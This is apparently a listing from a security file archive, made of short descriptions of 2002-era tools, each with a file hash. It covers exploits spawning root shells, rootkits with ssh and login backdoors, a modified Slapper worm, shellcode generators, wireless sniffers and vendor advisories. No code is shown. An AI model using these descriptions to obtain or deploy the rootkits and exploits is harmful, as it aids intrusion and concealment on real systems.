Research on the recent OpenBSD select() bug and its possible exploitation. Includes a local denial of service exploit which was tested on OpenBSD v2.6 - 3.1.
a139e465d5432bfb22c8cb02fcaad81f3ba8d7d7f42d2f31a3ad875ca2065362
Fuck'it RootKit. Uses a ssh daemon which listens on port 1984 by defaut.
ecda413afe774928a09b55ef7af38e67fd7c7f3fb6daa26f1ef757be52df5313
This is a modified version of the Slapper worm and was recovered from a compromised machine. Modifications to the worm let it mail system information, such as the ip address and processor type, to a Yahoo! email address. No other changes where made.
d871493127f042e44746b0d6678a391feb86eed4b2f5224af756399b4ec22188
This tool can be used to replace netstat in order to hide network sockets on a system.
e3829d7b3011d4e902f75347e995a7775ff3c56340d79178d3b5588617fa209f
Winfingerprint v0.5.3: Advanced remote windows OS detection. Current Features: Determine OS using SMB Queries, PDC (Primary Domain Controller), BDC (Backup Domain Controller), NT MEMBER SERVER, NT WORKSTATION, SQLSERVER, NOVELL NETWARE SERVER, WINDOWS FOR WORKGROUPS, WINDOWS 9X, Enumerate Servers, Enumerate Shares including Administrative ($), Enumerate Global Groups, E numerate Users, Displays Active Services, Ability to Scan Network Neighborhood, Ability to establish NULL IPC$ session with host, Ability to Query Registry (currently determines Service Pack Level & Applied Hotfixes.
90bf1fe4fd53df1e0615f1d129c9fa8b6f4e56ee982f6ef8272e6cff575937b4
Kismet is an 802.11b wireless network sniffer. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
b8facdc4e3ecabeb7c90224bfda8baf5903f4d6ee52939327bde3f868f18d01f
SPIKE proxy is a web application analysis tool which uses the SPIKE API to help reverse engineer new and unknown network protocols. Provides security analysis features for Web applications, a multi-threaded design, man in the middle SSL proxying, form rewriting, SQL injection detection, handles Connection: keep-alive properly (it is possible to log in to Hotmail with it), and rewrites User-Agent to pretend to be running IE. Requires pyOpenSSL pre 0.5 from the SPIKE Web page. Several working examples are included. Screenshot available here.
08787f66244491fa56d1a647c261268d4044bc34cf9b2299b02a138f29c94598
HashDB is a networked md5 hash comparison tool that allows you to automatically check the hashes of any files you download against a master database stored at www.immunitysec.com. This allows you to download source tarballs without worrying that they've been replaced by trojaned ./configure files.
4a1fc0b4fd64f1f50f53b470729606f6873f9dff312ef2a66c32af02f31e6501
Genshell is a fully generic win32 shellcode generator. It compiles on both Linux and Windows. Shellcode is also polymorphic (you can specify xor-byte value). A complete article with source code is included.
b90364b48c70c4622aa95c35d6ba27db5dd4ecbc4f71055d49fad2a4fef26089
Apple security advisory APPLE-SA-2002-09-19 - Apple QuickTime ActiveX v5.0.2 has a buffer overrun conditions that can result in execution of arbitrary code. To exploit this vulnerability an attacker would need to get his or her target to open a malicious HTML file as an attachment to an email message, as a file on the local or network file system, or as a file via HTTP.
5907e5ca8b939567f596c5abdbc0ead1070c8160b0c2423fbea33fdb62a333be
This exploit uses a symbolic link vulnerability in the Borland Interbase gds_lock_mgr binary to overwrite /etc/xinetd.d/xinetdbd with code that spawns a root shell on port 666 TCP.
d7d156c479c021809f9a0057514db6f1459ab7f03ab76f348bc1c94b1dfed0a8
Gentoo Linux security advisory - A vulnerability found in default Apache Tomcat 4.x installation can be used to remotely disclose the source of served JSP files.
44918fb3fe44c0391cb282db4a9797872dc7635f9b5b0467868f2917103a9e8a
Microsoft Security Advisory MS02-053 - Serious vulnerabilities have been discovered in Microsoft FrontPage Server Extensions 2000 and 2002 in the SmartHTML Interpreter (shtml.dll). FrontPage Server Extensions 2002 the flaw allows remote attackers to run code of his choice; on FrontPage Server Extensions 2000 the attacker can consume most or all available CPU until the service is restarted.
e336209cb8e7287fcc28062f2faba13182a7f5785256bb71bd5aa1e1aeb6918f
This exploit abuses the KEY_ARG buffer overflow that exists in SSL enabled Apache web servers that are compiled with OpenSSL versions prior to 0.9.6e. The apache-ssl-bug.c exploit is based on the Slapper worm (bugtraq.c), which is based on a early version of the apache-open-ssl exploit.
436090b56a7078c33d435bf10253452623305a3c47e6e5c7f13c05a10118fd8d
This tool can be used to scan IIS servers for the unicode directory traversal vulnerability.
d68555136e1216e01f665bb28f94c34d9fa82ebd4c0629f79f500a373361d1c4
How to unlock a Samsung T300 cellphone
95e3fe277638e94a8ff970e63471d9ea5628adfcf47a6652752477cf74c79994
Airsnort is a tool for wireless lans which recovers encryption keys by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Works on both 40 and 128 bit encryption. Many weaknesses in the WEP 802.11 protocol are discussed here. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second. Tested on Linux kernel v2.4.
02648ab47da49b596792193fe7e0d3a838aeee6fa0dcd41260a727aa7dad7044
A vulnerability found in default Apache Tomcat 4.x installation can be used to remotely disclose the source of served JSP files. The Tomcat developers fixed this issue in the Tomcat versions 4.0.5 and 4.1.12, which are available here.
2fef92ed7d59d75004c3b7399e643001f93de8ce9846efd4fb65db9ad40f1db1
WinME/XP UPNP denial of service exploit.
dd4090e55c9cd11ffd0a2b06d91b810031268e8bfab0b2aaefc0812502458aef
Voices is a *nix program that hides files in mp3's.
fc0629ea31bd0a4ceb7516abc767ab86a6065df9e8dfee324d664be4247672f0
Vbulletin/calender.php remote command execution exploit.
696c47bb743d4c61635d2b53c61441cce1ff71882f95ce0d1f8c84b21ee7c0c4
Shellcode-v1.0.zip is a genetic win32 shellcode generator based mainly on kungfoo. You can generate a shellcode with the help of a GUI. Source and executable included.
7ceadbc837c0a293c10e87c625f4338c9ca2fa138a5049d58d67ace148db452d
Apache v2.0.42 - Apache is the most popular webserver on the Internet, and ranks well in terms of security, functionality, efficiency, and speed. Changelog available here.
67222ed486ef13b54ce49f1d08ef8804fdd9c1e23d4d9ad8627f066335e7b93b
Gspoof is a GTK+ program written in C which makes easy and accurate the building and the sending of TCP packets with or without a data payload. It's possible to modify TCP/IP fields or the Ethernet header.
a88d6431a66a7fb6a6ac88abf80c2b92daaac376cb378ea57a11fce08d0db8d9
The Balaur Rootkit v2.0 is a rootkit for Red Hat 6.1 which is a descendant of lrk5. Contains a ssh backdoor, login backdoor, cron backdoor, adore, top, syslogd, and more. Patches common vulnerabilities to keep out other attackers.
96dd1e43908212e0dc4ef397abb29aaff477566103061db23da2fb10ca26af26